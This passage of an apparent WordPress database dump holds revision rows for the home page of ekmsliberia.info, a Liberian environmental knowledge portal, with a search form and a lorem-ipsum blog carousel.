<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 17:34:12','2019-11-08 17:34:12','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(404,1,'2022-08-22 10:08:37','2019-11-08 17:38:39',' ','','','publish','closed','closed','','404','','','2022-08-22 10:08:37','2022-08-22 10:08:37','',0,'https://ekmsliberia.info/?p=404',1,'nav_menu_item','',0),(412,1,'2019-11-08 18:24:33','2019-11-08 18:24:33','','Resource Categories','','publish','closed','closed','','resource_category','','','2019-11-08 18:25:55','2019-11-08 18:25:55','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=412',0,'_pods_pod','',0),(413,1,'2019-11-08 18:26:29','2019-11-08 18:26:29','','Resource Tags','','publish','closed','closed','','resource_tag','','','2019-11-08 18:26:57','2019-11-08 18:26:57','',0,'https://ekmsliberia.info/?post_type=_pods_pod&#038;p=413',0,'_pods_pod','',0),(414,1,'2019-11-08 18:33:13','2019-11-08 18:33:13','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg\" alt=\"Lacinia nunc curabitur tortor pellentesque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_159211.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\" title=\"Lacinia nunc curabitur tortor pellentesque\">Lacinia nunc curabitur tortor pellentesque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lacinia-nunc-curabitur-tortor-pellentesque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n			<!-- .oew-carousel -->','Home','','inherit','closed','closed','','9-revision-v1','','','2019-11-08 18:33:13','2019-11-08 18:33:13','',9,'https://ekmsliberia.info/9-revision-v1/',0,'revision','',0),(415,1,'2019-11-08 18:35:15','2019-11-08 18:35:15','<h2>Welcome to the EKMS</h2>		\n		<p>The Environmental Knowledge Management System provides free and open access to information from key government and other institutions relating to the implementation of Rio Conventions - The United Nations Framework Convention on Climate Change, The United Nations Convention to Combat Desertification, and The United Nations Convention on Biological Diversity. Explore the Knowledge Resources by Related Topics and Institutions Resources.</p>		\n<form method=\"get\" action=\"https://ekmsliberia.info/\" role=\"search\">\n						<input type=\"search\" placeholder=\"Search Knowledge Resources...\" value=\"\" name=\"s\" autocomplete=\"off\" />\n			<input type=\"hidden\" value=\"{&quot;search_source&quot;:&quot;any&quot;,&quot;search_taxonomy&quot;:&quot;category&quot;,&quot;include_terms_ids&quot;:&quot;&quot;,&quot;exclude_terms_ids&quot;:&quot;&quot;,&quot;exclude_posts_ids&quot;:&quot;&quot;,&quot;custom_fields_source&quot;:&quot;&quot;,&quot;results_order_by&quot;:&quot;relevance&quot;,&quot;results_order&quot;:&quot;asc&quot;}\" name=\"jet_ajax_search_settings\" />\n			<input type=\"hidden\" value=\"\" name=\"post_type\" />\n		<select  name=\"jet_ajax_search_categories\" data-placeholder=\"All Categories\" id=\'jet_ajax_search_categories_f4a4a39\' class=\'jet-ajax-search__categories-select\' >\n	<option value=\'0\' selected=\'selected\'>All Categories</option>\n	<option value=\"4\">News</option>\n</select>\n<button type=\"submit\">Search</button>\n</form>\n<button> Results</button>\n				<button>See all results</button>				\n			<h2>Latest from blog</h2>		\n		<p>Praesent vitae orci quam morbi vehicula eros sem, nec tincidunt ipsum imperdiet sed</p>		\n									<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg\" alt=\"Lorem ipsum dolor sit amet consectetur\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_305568.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\" title=\"Lorem ipsum dolor sit amet consectetur\">Lorem ipsum dolor sit amet consectetur</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/lorem-ipsum-dolor-sit-amet-consectetur/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg\" alt=\"Cras metus sed aliquet risus a tortor odio\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_954236.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\" title=\"Cras metus sed aliquet risus a tortor odio\">Cras metus sed aliquet risus a tortor odio</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/cras-metus-sed-aliquet-risus-a-tortor-odio/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg\" alt=\"Quis ligula lacinia aliquet mauris ipsum\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_854697.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\" title=\"Quis ligula lacinia aliquet mauris ipsum\">Quis ligula lacinia aliquet mauris ipsum</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/quis-ligula-lacinia-aliquet-mauris-ipsum/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg\" alt=\"Pellentesque nibh aenean in scelerisque\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_853214.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\" title=\"Pellentesque nibh aenean in scelerisque\">Pellentesque nibh aenean in scelerisque</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a href=\"https://ekmsliberia.info/pellentesque-nibh-aenean-in-scelerisque/\">Learn More</a>\n										<!-- .oew-carousel-entry-excerpt -->\n								<!-- .oew-carousel-entry-details -->\n									<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">\n										<img width=\"300\" height=\"166\" src=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg\" alt=\"Nulla metus metus ullamcorper vel tincidunt\" itemprop=\"image\" srcset=\"https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-300x166.jpg 300w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402-768x424.jpg 768w, https://ekmsliberia.info/wp-content/uploads/2017/08/img_263402.jpg 833w\" sizes=\"(max-width: 300px) 100vw, 300px\" />\n									</a>\n								<!-- .oew-carousel-entry-media -->\n										<h2>\n											<a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/\" title=\"Nulla metus metus ullamcorper vel tincidunt\">Nulla metus metus ullamcorper vel tincidunt</a>\n										</h2>\n										<ul>\n																							<li itemprop=\"datePublished\" pubdate>August 29, 2017</li>\n																							<li><a href=\"https://ekmsliberia.info/nulla-metus-metus-ullamcorper-vel-tincidunt/#respond\" >0 Comments</a></li>\n										</ul>\n											Lorem ipsum dolor sit amet, consectetur adipiscing elit. Integer nec odio. Praesent libero. Sed cursus&hellip;										<!-- .oew-carousel-entry-excerpt -->\n											<a 